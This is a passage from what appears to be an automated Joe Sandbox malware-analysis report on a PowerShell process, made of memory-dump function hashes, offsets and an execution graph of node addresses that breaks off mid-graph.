• Instruction ID: 4715f7cbb3bd912f052cf2b2ae28a698adaf93ae239c87dfe22fe40220bb9305
• Opcode Fuzzy Hash: ebf194f902265020451a0e3dce63cbb275f747b80b1d803a45489f5fdd21fab2
• Instruction Fuzzy Hash: 9A21AE75A042488FCB24DFAED45479FBFF5EB89320F14842AD118A7340CB79A905CBA5
Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d2e5731827a00a896c3708fdd5fc9bcb3ca6a266d9ba0790aacbc2a86df4a3ce
• Instruction ID: d7166f981f58370f3788cf6f986ce06165b95afb48156971932613cf80ce9763
• Opcode Fuzzy Hash: d2e5731827a00a896c3708fdd5fc9bcb3ca6a266d9ba0790aacbc2a86df4a3ce
• Instruction Fuzzy Hash: 4731AE769027849EEB60CF6AD0883CAFBF2EF89324F28C41ED55D9B245C7785482CB51
Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b69ba03744aecb02919deaead2067c2c1f53410bbca6561c2f877bb214e74b03
• Instruction ID: ce157db0c7cb5cb3de4adbee8f7ff6b0e331415e6702e9aabbaf4ac094ca6e2a
• Opcode Fuzzy Hash: b69ba03744aecb02919deaead2067c2c1f53410bbca6561c2f877bb214e74b03
• Instruction Fuzzy Hash: C53164B4A00249DFEB44EF64D859ABE77B2EF84300F118479D115AB395DB79AD018FA0
Memory Dump Source
• Source File: 0000000E.00000002.2622288050.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_6f70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: afbffc138ae5be36076456b090a223b519beeb0db418cb2ada7b2e0080ce4b26
• Instruction ID: 210b8e44d1c0a47373cc2b34c57045da20bd4386830a5046287a516e040975af
• Opcode Fuzzy Hash: afbffc138ae5be36076456b090a223b519beeb0db418cb2ada7b2e0080ce4b26
• Instruction Fuzzy Hash: F021A136E04205DFEFA4CF59C684BA9B7E5BB44361F04C167E8088B251C739DB86CBA1
Memory Dump Source
• Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ad4812d5a667553ad5fd410b1a836e7c66ce4f5c4c522de76cd8999ab445ac45
• Instruction ID: fbffc13cdf09da47d3cbb8b1d8962fa9584813414118fc4641a9bd3d42e806dd
• Opcode Fuzzy Hash: ad4812d5a667553ad5fd410b1a836e7c66ce4f5c4c522de76cd8999ab445ac45
• Instruction Fuzzy Hash: 3521D172A04240EFEB05DF54D9C0B27BB65FB88314F24C5A9E9090A257C33AD856CBA1
Memory Dump Source
• Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8d7e2bbdeefa666e1416e997efea17ae431b471b698456e407728943c422ba30
• Instruction ID: 39e799585b97c519c47648925131d26bc41d830edc1cd73eac0843effecec123
• Opcode Fuzzy Hash: 8d7e2bbdeefa666e1416e997efea17ae431b471b698456e407728943c422ba30
• Instruction Fuzzy Hash: 0621D775904244EFEB18DF28D9C0B26BB65FB84314F24C57DD9494B247C37AD846CA61
Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2dba79399bef73fb09e9948fe59131271cfac78cd47ef07119e4a719bf7ee19d
• Instruction ID: 752d8d42dd83dc6d93493fc3a591ad24cc2bab149faccbdc95d129b72328a324
• Opcode Fuzzy Hash: 2dba79399bef73fb09e9948fe59131271cfac78cd47ef07119e4a719bf7ee19d
• Instruction Fuzzy Hash: 22217E719067849EEB60CF6AC4887CAFBF2EB89310F28C41DD54D97245D7785441CB51
Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0012df796026a78b49015d5490fd20662ea5d952e63b7fc792ed970fdabe2338
• Instruction ID: c008d3da03e7e41ec4b269ce876eddfd4316c8a357e3b50ddd3ecac3b74155e8
• Opcode Fuzzy Hash: 0012df796026a78b49015d5490fd20662ea5d952e63b7fc792ed970fdabe2338
• Instruction Fuzzy Hash: DC119E753042149FDB089B6AE858D6A7BEAFF89720714046AE509C7395DF35DC01CB90
Memory Dump Source
• Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b95cc529720e78874375e9c022ed428672d37401c78743fab9c9d47fedb04465
                                                                                                                                      • Instruction ID: 0875f17a57a4745764631ab511f8868dac4bf670c989f43378361071c4c8619b
                                                                                                                                      • Opcode Fuzzy Hash: b95cc529720e78874375e9c022ed428672d37401c78743fab9c9d47fedb04465
                                                                                                                                      • Instruction Fuzzy Hash: F311047A7001188FCB04DBA9E8549AE77F6EBCC325B0440A5E909DB315DB39ED128BA0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 79743b7ef64e79def9027e5355c367a0ea036754744aa2e52695c6db9a72276b
                                                                                                                                      • Instruction ID: d2b73f8ec1afdfe9c73884ed729b7e6bee13c33d9731846869a261c024cc93ec
                                                                                                                                      • Opcode Fuzzy Hash: 79743b7ef64e79def9027e5355c367a0ea036754744aa2e52695c6db9a72276b
                                                                                                                                      • Instruction Fuzzy Hash: 21215C76904280DFDB06CF50D9C4B16BF72FB88314F24C5A9D9494A657C33AD86ACB91
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e8a5e795c271a1f8db52526d23457b7176ad3f03ccde2004cbc064825bf42d4c
                                                                                                                                      • Instruction ID: bac12802b5434519a5e5991a29fe7c027ad75410bfaf96b1ab535b3b0feeefdd
                                                                                                                                      • Opcode Fuzzy Hash: e8a5e795c271a1f8db52526d23457b7176ad3f03ccde2004cbc064825bf42d4c
                                                                                                                                      • Instruction Fuzzy Hash: 2D117971901685CFDB10CF9AD604B9EBBF4AF48310F24886DD018A7281D3399944CBA1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0e074c66091f42264c338087dd8e67e8934f5c9a6a74f81f19a2831112881f99
                                                                                                                                      • Instruction ID: d416ca42eba3098662d180696e63b5b536109ecb077132a48ffc935c13d5dc09
                                                                                                                                      • Opcode Fuzzy Hash: 0e074c66091f42264c338087dd8e67e8934f5c9a6a74f81f19a2831112881f99
                                                                                                                                      • Instruction Fuzzy Hash: C4119D76904284DFDB15CF24D5C4B15FFA1FB84324F28C6AAD8494B657C33AD84ACB62
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1fea2b89a71f4a1e696852929cc430f174b2d38bc4a0568fe3e16e00143da19b
                                                                                                                                      • Instruction ID: c7092d5700001478c775d6a6b4b69c3e9afd6ccd8e221b4b0b18d2571ccca19f
                                                                                                                                      • Opcode Fuzzy Hash: 1fea2b89a71f4a1e696852929cc430f174b2d38bc4a0568fe3e16e00143da19b
                                                                                                                                      • Instruction Fuzzy Hash: 471148B1901789CFDB10CF9AC544BDEBBF4EB48314F24886DD508A7241D339A944CFA5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ed5ff5d67cc50752791c1e6e4100bc6205a1857b2b3f76563780c0f2e27bbf61
                                                                                                                                      • Instruction ID: 549f7e395f5d88fc9ca2781459e2c02e2d68ebbf50a35fae1b6a75d4905bac3d
                                                                                                                                      • Opcode Fuzzy Hash: ed5ff5d67cc50752791c1e6e4100bc6205a1857b2b3f76563780c0f2e27bbf61
                                                                                                                                      • Instruction Fuzzy Hash: 560192356093849FD728CB76D894BAA7FE5AF49310F1484AEE15ACB6A2CB34AC45C701
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fd6f4d2c39bda3e4c6dae4b3d5956ec205d2fd63ef301b6f58545f35797568d5
                                                                                                                                      • Instruction ID: d39b0b7e734c6deea3f321fa7f929f17819141d0880567bf5659e9676bcdf2e3
                                                                                                                                      • Opcode Fuzzy Hash: fd6f4d2c39bda3e4c6dae4b3d5956ec205d2fd63ef301b6f58545f35797568d5
                                                                                                                                      • Instruction Fuzzy Hash: 3011A571909294DFCB02CF6DD8A09EDBFB0EF4A314B1541C6D4649B2A3C6369C16CB66
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c564941f6db3890d26d97ef899a1d7dc9b29bad1a4d55ffe10f6ee4f3497f64
                                                                                                                                      • Instruction ID: ff1510e74b074769f84f9192264fde3f0d66b045dceb427cc16dd5e7bfca790c
                                                                                                                                      • Opcode Fuzzy Hash: 0c564941f6db3890d26d97ef899a1d7dc9b29bad1a4d55ffe10f6ee4f3497f64
                                                                                                                                      • Instruction Fuzzy Hash: 941139342047408FC728DF39C04085ABBF2EF8931532089ADD44A877A0DB36EC41CF40
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6922ef2bfbaef24a2ca48749bb82b98ad382521af0ba03de89613a37c1e3b499
                                                                                                                                      • Instruction ID: 8d8bef1f9f425442df4c7f1a5cd8b35b292b64b2c89b7efe9d5556a216ac38b8
                                                                                                                                      • Opcode Fuzzy Hash: 6922ef2bfbaef24a2ca48749bb82b98ad382521af0ba03de89613a37c1e3b499
                                                                                                                                      • Instruction Fuzzy Hash: 9801F232504340EAF7244A25E984B66FFA8EF82B60F18841AED081A283C37D9C45CAB1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f6b3a932b71fdd49e0487ee1ab8726a02249f8cb3a14870c76a237e0637a988a
                                                                                                                                      • Instruction ID: ce3fe27e4ca16de7bb8556a0a73b631f70ede06b2631b20880b8389220b4aa0f
                                                                                                                                      • Opcode Fuzzy Hash: f6b3a932b71fdd49e0487ee1ab8726a02249f8cb3a14870c76a237e0637a988a
                                                                                                                                      • Instruction Fuzzy Hash: 9E01F731B051849BCB14DBB9E8148F9BFB69FCC220F18846AE40697351DE755C55CBA1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 168f4b91abea331c384cbb83739e0db57e465f9f51638a7f4dd364439d34594f
                                                                                                                                      • Instruction ID: 532bbe336c84eb4e592ef3a2c4b108a9b8190a278b3bc929484d2f579e300215
                                                                                                                                      • Opcode Fuzzy Hash: 168f4b91abea331c384cbb83739e0db57e465f9f51638a7f4dd364439d34594f
                                                                                                                                      • Instruction Fuzzy Hash: 17F0F6727092A05FD7108A7A9C90AB7BFEDEFD9620B08447BF944C7391DA74CD1087A0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557586433.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_73d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5e06ecc320fb281dd4d3f6414e0e934a3a2a6beac2e36164b919f804806e3238
                                                                                                                                      • Instruction ID: 1e569b96322c1ecd2aa1979fe05c8e1c7b555d3c509b9056b3e69d473f5a2a0e
                                                                                                                                      • Opcode Fuzzy Hash: 5e06ecc320fb281dd4d3f6414e0e934a3a2a6beac2e36164b919f804806e3238
                                                                                                                                      • Instruction Fuzzy Hash: B4F0F976200604AF97208F0AD985C63FBADEBD477071AC55AE84A4B612C771FC41CEA0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c239ad10b72f7b633f7b2a173e8aba933a98aaee5bdc9989b5109ad020e9a538
                                                                                                                                      • Instruction ID: eafa668f746f6b3a62f1db19f86ad933f27472bd42b9e888873a95137155d864
                                                                                                                                      • Instruction Fuzzy Hash: 7DE0ED71D152469FCB44DF78C48155ABFF0EF0A314B2085FED849DB611E3324901CB95
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c6b8a6a12358432305b3b5ec74394e3ea22645fa3cf7a3f31c9c7aaf0801314
                                                                                                                                      • Instruction ID: 4ac19d08778a805a3853389af3968db8cd3d6a413528b99edf818017a7f388c2
                                                                                                                                      • Opcode Fuzzy Hash: 0c6b8a6a12358432305b3b5ec74394e3ea22645fa3cf7a3f31c9c7aaf0801314
                                                                                                                                      • Instruction Fuzzy Hash: FEE0463190514ACBCB48AFA4F81A4FDBFB4FB14321B00015EE907536909E381A8ACAC1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8a30de1a840738f570a88c8879c68c305800ec6f090a43eae556601b9203cdd4
                                                                                                                                      • Instruction ID: 3b04a3b29221f09bd1451279c572f0e1b913b31cae28ae4eff5db6fbcf93c312
                                                                                                                                      • Opcode Fuzzy Hash: 8a30de1a840738f570a88c8879c68c305800ec6f090a43eae556601b9203cdd4
                                                                                                                                      • Instruction Fuzzy Hash: 04E08631F09147CFC748EFA4E4465ED7FB1AB45304B008069E90997741DA305D41CB81
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                      • Instruction ID: 394b6746088f20fc0363e68fe51d84b189e6dc6662121548b8abe16da7d5749c
                                                                                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                      • Instruction Fuzzy Hash: 53D067B0D052499F8780EFADC94166EFBF4EB49200F6085BAC91DE7341E7329A12CBD1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 56659f7794446e8f36a253140f0fc1ef439a9151ee0e845f654804ca249c8de3
                                                                                                                                      • Instruction ID: 836297a36d04fc7f8f182183d6c2ad68d7953c8b52652fc595e934e83de77a0a
                                                                                                                                      • Opcode Fuzzy Hash: 56659f7794446e8f36a253140f0fc1ef439a9151ee0e845f654804ca249c8de3
                                                                                                                                      • Instruction Fuzzy Hash: 53D06731C0510ACBCB48AFA5E85B4FDBB74FA14312F504169D90753190EE351A5ACEC5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: babb8867fd1b8b7d6e0faf9f88aabb5f21fa306bc55b4c1c074eb30d82bed7e5
                                                                                                                                      • Instruction ID: db9439375f1826dee62dbc9767c6cc3f1a7a910ee51743d4e2a1183de914c434
                                                                                                                                      • Opcode Fuzzy Hash: babb8867fd1b8b7d6e0faf9f88aabb5f21fa306bc55b4c1c074eb30d82bed7e5
                                                                                                                                      • Instruction Fuzzy Hash: 41D01234D0420A8FC748EF64E8468ADBBB4AB45300F104165DD0993340EA345C01CBC1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3f19d0e731eca4a2d13ccc0ee380d7432dcc5def6df76d712b5a3fbca4cde6b2
                                                                                                                                      • Instruction ID: 720b4710ffaa8057c67b0e25aedd2aed5e0ffa157110b96c91f4ba840435eadf
                                                                                                                                      • Opcode Fuzzy Hash: 3f19d0e731eca4a2d13ccc0ee380d7432dcc5def6df76d712b5a3fbca4cde6b2
                                                                                                                                      • Instruction Fuzzy Hash: 0DB09230185B488FC2486F75AC04915732DAB40216B9004A8E80E0A2A28E7AE884CE44
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c966ce1e7402bb1515dab60a37b61d6257a0e10546ed9c0cc8db9e4638881f47
                                                                                                                                      • Instruction ID: 497e4112004dc7f6cafb865955b301fcafbc78a1d5301691b20a282f09d15350
                                                                                                                                      • Opcode Fuzzy Hash: c966ce1e7402bb1515dab60a37b61d6257a0e10546ed9c0cc8db9e4638881f47
                                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:9.1%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:1477
                                                                                                                                      Total number of Limit Nodes:13
                                                                                                                                      execution_graph 24981 2bbbb44 24984 2baec74 24981->24984 24983 2bbbb4c 24985 2baec7c 24984->24985 24985->24985 26430 2ba870c 24985->26430 24987 2baec9e 24988 2baeca3 24987->24988 24989 2baed28 24988->24989 26436 2ba8824 24989->26436 24991 2baed3b 24992 2baed8c 24991->24992 24993 2ba8824 3 API calls 24992->24993 24994 2baed9f 24993->24994 24995 2baedf0 24994->24995 24996 2baedfa 24995->24996 24997 2ba8824 3 API calls 24996->24997 24998 2baee03 24997->24998 24999 2baee5e 24998->24999 25000 2ba8824 3 API calls 24999->25000 25001 2baee67 25000->25001 25002 2baeec2 25001->25002 25003 2ba8824 3 API calls 25002->25003 25004 2baeecb 25003->25004 25005 2baeee9 25004->25005 25006 2baef26 25005->25006 25007 2ba8824 3 API calls 25006->25007 25008 2baef2f 25007->25008 25009 2baef4d 25008->25009 25010 2ba8824 3 API calls 25009->25010 25011 2baef93 25010->25011 25012 2baef98 25011->25012 25013 2bbaa23 25012->25013 25014 2baefa0 25012->25014 26444 2baebf0 25014->26444 25016 2baefa5 25016->25013 25017 2ba8824 3 API calls 25016->25017 25018 2baefd4 25017->25018 25019 2baeff2 25018->25019 25020 2ba8824 3 API calls 25019->25020 25021 2baeffb 25020->25021 25022 2ba8824 3 API calls 25021->25022 25023 2baf02e 25022->25023 25024 2baf067 25023->25024 25025 2baf09e 25024->25025 25026 2ba8824 3 API calls 25025->25026 25027 2baf0aa 25026->25027 25028 2ba8824 3 API calls 25027->25028 25029 2baf0dd 25028->25029 25030 2ba8824 3 API calls 25029->25030 25031 2baf110 25030->25031 25032 2ba8824 3 API calls 25031->25032 25033 2baf143 25032->25033 25034 2baf164 25033->25034 25035 2baf17c 25034->25035 25036 2baf1a6 25035->25036 25037 2ba8824 3 API calls 25036->25037 25038 2baf1bf 25037->25038 25039 2baf1f8 25038->25039 25040 2baf217 25039->25040 25041 2baf222 25040->25041 25042 2ba8824 3 API calls 25041->25042 25043 2baf23b 25042->25043 25044 2ba8824 3 API calls 
25043->25044 25045 2baf26e 25044->25045 25046 2baf27e 25045->25046 25047 2ba8824 3 API calls 25046->25047 25048 2baf2a1 25047->25048 25049 2ba8824 3 API calls 25048->25049 25050 2baf2d4 25049->25050 25051 2baf300 25050->25051 25052 2baf32c 25051->25052 25053 2ba8824 3 API calls 25052->25053 25054 2baf350 25053->25054 25055 2ba8824 3 API calls 25054->25055 25056 2baf383 25055->25056 25057 2baf3aa 25056->25057 25058 2ba8824 3 API calls 25057->25058 25059 2baf3b6 25058->25059 25060 2ba8824 3 API calls 25059->25060 25061 2baf3e9 25060->25061 25062 2baf40a 25061->25062 25063 2baf415 25062->25063 25064 2baf422 25063->25064 25065 2ba8824 3 API calls 25064->25065 25066 2baf465 25065->25066 25067 2baf491 25066->25067 25068 2baf4c8 25067->25068 25069 2ba8824 3 API calls 25068->25069 25070 2baf4e1 25069->25070 25071 2baf508 25070->25071 25072 2ba8824 3 API calls 25071->25072 25073 2baf514 25072->25073 25074 2baf53b 25073->25074 25075 2ba8824 3 API calls 25074->25075 25076 2baf547 25075->25076 25077 2ba8824 3 API calls 25076->25077 25078 2baf57a 25077->25078 25079 2baf5b3 25078->25079 25080 2ba8824 3 API calls 25079->25080 25081 2baf5f6 25080->25081 25082 2baf62f 25081->25082 25083 2ba8824 3 API calls 25082->25083 25084 2baf672 25083->25084 25085 2baf693 25084->25085 25086 2baf6ab 25085->25086 25087 2ba8824 3 API calls 25086->25087 25088 2baf6ee 25087->25088 25089 2baf70f 25088->25089 25090 2baf727 25089->25090 25091 2ba8824 3 API calls 25090->25091 25092 2baf76a 25091->25092 25093 2baf779 25092->25093 25094 2baf7a3 25093->25094 25095 2baf7df 25094->25095 25096 2baf80b 25095->25096 25097 2baf823 25096->25097 25098 2ba8824 3 API calls 25097->25098 25099 2baf82f 25098->25099 25100 2baf850 25099->25100 25101 2baf85b 25100->25101 25102 2baf887 25101->25102 25103 2baf89f 25102->25103 25104 2ba8824 3 API calls 25103->25104 25105 2baf8ab 25104->25105 25106 2baf8cc 25105->25106 25107 2baf9e1 25106->25107 25108 2baf8d4 25106->25108 25110 2bafa0d 25107->25110 25109 2baf8f5 25108->25109 
